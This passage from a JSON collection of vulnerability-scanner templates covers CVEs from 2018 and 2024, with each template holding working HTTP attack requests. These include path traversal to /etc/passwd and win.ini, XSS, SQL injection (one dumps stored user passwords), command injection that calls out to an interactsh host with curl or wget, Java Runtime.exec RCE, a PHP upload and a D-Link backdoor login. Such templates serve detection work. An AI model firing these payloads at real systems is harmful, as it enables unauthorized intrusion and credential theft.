Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCodes 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7719","info":{"name":"Acrolinx Server <5.2.5 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1271","info":{"name":"Spring MVC Framework - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini","{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0296","info":{"name":"Cisco ASA - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"],"headers":{"Accept-Encoding":"deflate"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["///sessions"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"header","words":["Server: mini_httpd"],"internal":true}]},{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2024-5421","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/info/dir?/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/var/tmp</td>","File System Info","face=\"courier"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37843","info":{"name":"Craft CMS <=v3.7.31 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type:application/json\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\\\", limit: 5){filename}}\"}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General error: 1105 XPATH syntax error: '\\n{{matcher}}"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-27564","info":{"name":"ChatGPT\u4e2a\u4eba\u4e13\u7528\u7248 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd","{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"image/jpeg\")","regex('root:.*:0:0:', body)"],"condition":"and"},{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"image/jpeg\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-2621","info":{"name":"Fujian Kelixin Communication - Command Injection","severity":"medium"},"requests":[{"raw":["@timeout 15s\nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_all(body,\"msg\\\":\",\"header\\\":\",\"code\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-0195","info":{"name":"SpiderFlow Crawler Platform - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["SPIDER_FLOW_VERSION"]}]},{"raw":["POST /function/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-4295","info":{"name":"Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"You have been successfully subscribed\")"],"condition":"and"}]}]},{"id":"CVE-2024-36412","info":{"name":"SuiteCRM - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_any(body, \"You have already responded to the invitation or there\", \"Thank you for accepting\")"],"condition":"and"}]}]},{"id":"CVE-2024-2389","info":{"name":"Progress Kemp Flowmon - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains(header, 'application/json') && contains(header, 'Flowmon')"],"condition":"and"}]}]},{"id":"CVE-2024-1209","info":{"name":"LearnDash LMS < 4.10.2 - Sensitive Information Exposure via assignments","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-assignment"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","slug\":\"assignment",".pdf\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6926","info":{"name":"Viral Signup <= 2.1 -  SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/viral-signup\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-24112","info":{"name":"Exrick XMall - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","MySQLSyntaxErrorException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-44000","info":{"name":"LiteSpeed Cache <= 6.4.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/litespeed-cache\")"],"internal":true}]},{"raw":["GET /wp-content/debug.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"response","regex":["(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36104","info":{"name":"Apache OFBiz - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"word","part":"body","words":["java.lang.Exception"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6846","info":{"name":"SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge","severity":"medium"},"requests":[{"raw":["POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"months\":\"1\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"success\",\"true\", \"purged successfully\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1021","info":{"name":"Rebuild <= 3.5.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<h1> Interactsh Server </h1>\")","!contains(body_1, \"<h1> Interactsh Server </h1>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-34257","info":{"name":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/page/index.html\n\n{\n\"token\":\"\",\n\"apcliEncrypType\":\"`id>../{{file}}.txt`\",\n\"topicurl\":\"setWiFiExtenderConfig\"\n}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"success\": true"]},{"type":"regex","part":"body_2","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-8752","info":{"name":"WebIQ 2.15.9 - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts]\",\"extensions]\")","contains(content_type,\"image/svg+xml\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-37393","info":{"name":"SecurEnvoy Two Factor Authentication - LDAP Injection","severity":"critical"},"requests":[{"raw":["POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:{{userid}})(sAMAccountName=*\nMEMBEROF:Domain Users\n","POST /secserver/? HTTP/2\nHost: {{Hostname}}\n\nFLAG=DESKTOP\n1\nSTATUS:INIT\nUSERID:*)(sAMAccountName=*\nMEMBEROF:Domain Users\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Error checking Group')","status_code_1 == 200","contains(body_2, 'GETPASSCODE')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1728","info":{"name":"Gradio > 4.19.1 UploadButton - Path Traversal","severity":"high"},"requests":[{"raw":["POST /queue/join? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"data\":[[{\"path\":\"{{path}}\",\"url\":\"{{BaseURL}}/file=/help\",\"orig_name\":\"CHANGELOG.md\",\"size\":3549,\"mime_type\":\"text/markdown\"}]],\"event_data\":null,\"fn_index\":0,\"trigger_id\":2,\"session_hash\":\"{{randstr}}\"}\n","GET /queue/data?session_hash={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /file={{extracted_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"extracted_path","regex":["/tmp/gradio/.*/passwd","C:.*\\win\\.ini"],"internal":true}],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\") || regex(\"root:.*:0:0:\", body)","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-28255","info":{"name":"OpenMetadata - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22{{payload}}%22))) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(interactsh_protocol, 'dns')","contains(body, \"java.lang.Boolean\")","contains(header, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2024-34351","info":{"name":"Next.js - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}","{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["The requested resource isn't a valid image"]}]}]},{"id":"CVE-2024-47062","info":{"name":"Navidrome < 0.53.0 - Authenticated SQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/login HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"extractors":[{"type":"json","name":"auth_token","internal":true,"part":"body","json":[".token"]}]},{"raw":["GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&1+like+1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,(select+group_concat(concat(user_name,':',password))from+user),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--=123 HTTP/1.1\nHost: {{Hostname}}\nx-nd-authorization: Bearer {{auth_token}}\n"],"extractors":[{"type":"regex","group":1,"part":"body","regex":["sql/driver: couldn't convert \\\\\\\"(.*?)\\\\\\\""]}]}]},{"id":"CVE-2024-1512","info":{"name":"MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body,\"items\",\"total\",\"total_price\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-3552","info":{"name":"Web Directory Free < 1.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/web-directory-free"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=w2dc_get_map_marker_info&locations_ids[]=(select+if(1=1,sleep(6),0)+from+(select+1)x)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","regex('^\\[\\]$', body)"],"condition":"and"}]}]},{"id":"CVE-2024-30188","info":{"name":"Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write","severity":"high"},"requests":[{"raw":["POST /dolphinscheduler/login HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&userPassword={{password}}&ssoLoginUrl="],"extractors":[{"type":"json","name":"sessionId","part":"body","json":[".data.sessionId"],"internal":true}]},{"raw":["GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd  HTTP/1.1\nHost: {{Hostname}}\nsessionId: {{sessionId}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3400","info":{"name":"GlobalProtect - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n","POST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: {{Hostname}}\nCookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;\nContent-Type: application/x-www-form-urlencoded\n\nuser=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global\n","GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_3 == 403","contains(body_2, 'invalid required input parameters')"],"condition":"and"}]}]},{"id":"CVE-2024-34982","info":{"name":"LyLme-Spage - Arbitary File Upload","severity":"high"},"requests":[{"raw":["POST /include/file.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------575673989461736\n\n-----------------------------575673989461736\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: image/png\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------575673989461736--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"code\":","\"msg\":","\"url\":","php\"}"],"condition":"and","internal":true},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","part":"body","group":1,"regex":["\"url\":\"([/a-z_0-9.]+)\""],"internal":true}]},{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"{{string}}\" )","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-3922","info":{"name":"Dokan Pro <= 3.10.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/dokan-pro/changelog.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Dokan product"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1\nHost: {{Hostname}}\n\n{\"env\":\"1\",\"event\":\"invoice.created\",\"resource\":{\"subscription_code\":\"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='\"}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 302"],"condition":"and"}]}]},{"id":"CVE-2024-3273","info":{"name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auth_state>1</auth_state>"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33610","info":{"name":"Sharp Multifunction Printers - Cookie Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sessionlist.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No.","User","From","Last login","Last access","Language 